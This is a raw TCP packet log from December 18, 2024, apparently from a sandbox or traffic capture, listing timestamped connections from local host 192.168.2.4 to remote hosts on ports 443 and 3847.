                                                                                                                                                Dec 18, 2024 19:26:25.636710882 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:25.637279034 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:36.294403076 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:36.294497013 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:36.294608116 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:36.453500986 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:36.453548908 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:37.897233009 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:37.897334099 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:37.901374102 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:37.901420116 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:37.901864052 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:37.909133911 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:37.955336094 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.445570946 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.445600986 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.445684910 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:38.445730925 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.462584972 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.462662935 CET4434973993.95.216.175192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:38.462671041 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:38.462716103 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:26:38.462975979 CET49739443192.168.2.493.95.216.175
                                                                                                                                                Dec 18, 2024 19:27:06.424465895 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:06.424499035 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:06.424598932 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:06.437480927 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:06.437493086 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.120311975 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.120389938 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.168091059 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.168114901 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.169014931 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.169090986 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.170499086 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.211354971 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.946787119 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.946846008 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.946852922 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.946886063 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.946907997 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.946938992 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:08.946944952 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:08.946983099 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.169425011 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.169462919 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.169497013 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.169519901 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.182796001 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.182868958 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.205941916 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.206023932 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.223126888 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.223201036 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.401953936 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.402025938 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.413017988 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.413094044 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.432084084 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.432158947 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.446331024 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.446394920 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.460658073 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.460732937 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.475002050 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.475066900 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.494026899 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.494098902 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.508228064 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.508289099 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.634489059 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.634567976 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.643707991 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.643779993 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.653105974 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.653181076 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.662647009 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.662725925 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.675513983 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.675595999 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.684190989 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.684278011 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.693526983 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.693595886 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.706542969 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.706624985 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.715507030 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.715589046 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.724819899 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.724917889 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.735635996 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.735717058 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.745081902 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.745153904 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.754544973 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.754620075 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.766737938 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.766805887 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.776083946 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.776165009 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.839262009 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.839359999 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.866942883 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.867023945 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.872908115 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.872972965 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.872992039 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.879292011 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.879368067 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.885186911 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.885252953 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.891067028 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.891129971 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.894309998 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.894375086 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.897630930 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.897705078 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.900959015 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.901021957 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.905291080 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.905375004 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.908654928 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.908715010 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.911919117 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.911989927 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.915790081 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.915854931 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.919156075 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.919219971 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.923261881 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.923357010 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:09.926759005 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:09.926835060 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.026201010 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.026292086 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.029553890 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.029617071 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.062030077 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.062120914 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.065758944 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.065826893 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.068623066 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.068696022 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.127898932 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.128006935 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.358803988 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.358838081 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.358896971 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.358921051 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.361368895 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.361459017 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.364228010 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.364336014 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.367269039 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.367352009 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.591368914 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.591401100 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:10.591470957 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:10.591500044 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.797514915 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:11.797552109 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:11.797591925 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.797625065 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.797674894 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:11.797729969 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.797739029 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:11.797781944 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.797825098 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:11.797878981 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.798106909 CET49809443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:27:11.798121929 CET44349809202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:16.185533047 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:16.306163073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:16.306253910 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:16.306425095 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:16.430407047 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:17.551980972 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:17.555263042 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:17.775005102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.064063072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.073440075 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.193609953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535245895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535289049 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535343885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535377979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535413980 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535465956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535476923 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.535478115 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.535501957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535520077 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.535536051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.535583973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.535588026 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.543521881 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.543700933 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.546072960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.546230078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.546299934 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.657320976 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.727380991 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.727444887 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.727503061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.731395960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.731434107 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.731448889 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.739044905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.739115000 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.739142895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.746926069 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.746980906 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.746999025 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.754451990 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.754522085 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.754547119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.762062073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.762113094 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.762489080 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.769932985 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.769987106 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.770256996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.777616024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.777662039 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.777720928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.785434961 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.785480022 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.785485029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.793304920 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.793358088 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.793371916 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.801057100 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.801100016 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.801142931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.847357988 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.847415924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.847436905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.847481012 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.919913054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.920033932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.920234919 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.923759937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.923897028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.923943043 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.931901932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.931919098 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.931969881 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.939446926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.939502954 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.939908981 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.947285891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.947310925 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.947380066 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.955264091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.955291033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.955353022 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.962912083 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.962938070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.962997913 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.970685959 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.970758915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.970829010 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.978558064 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.978657961 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.978722095 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.986232996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.986366987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.986437082 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.989757061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.989857912 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.989928007 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.993621111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.993638039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.993700027 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:18.997194052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.997510910 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:18.997577906 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.000751019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.000808001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.000869989 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.004488945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.004646063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.005464077 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.008229971 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.008289099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.009460926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.011836052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.011859894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.011917114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.015353918 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.015391111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.015465975 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.019110918 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.019164085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.019242048 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.022670031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.022808075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.022959948 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.043417931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.043461084 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.043520927 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.045320988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.045357943 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.045455933 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.049182892 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.049367905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.049454927 CET498403847192.168.2.487.120.127.215
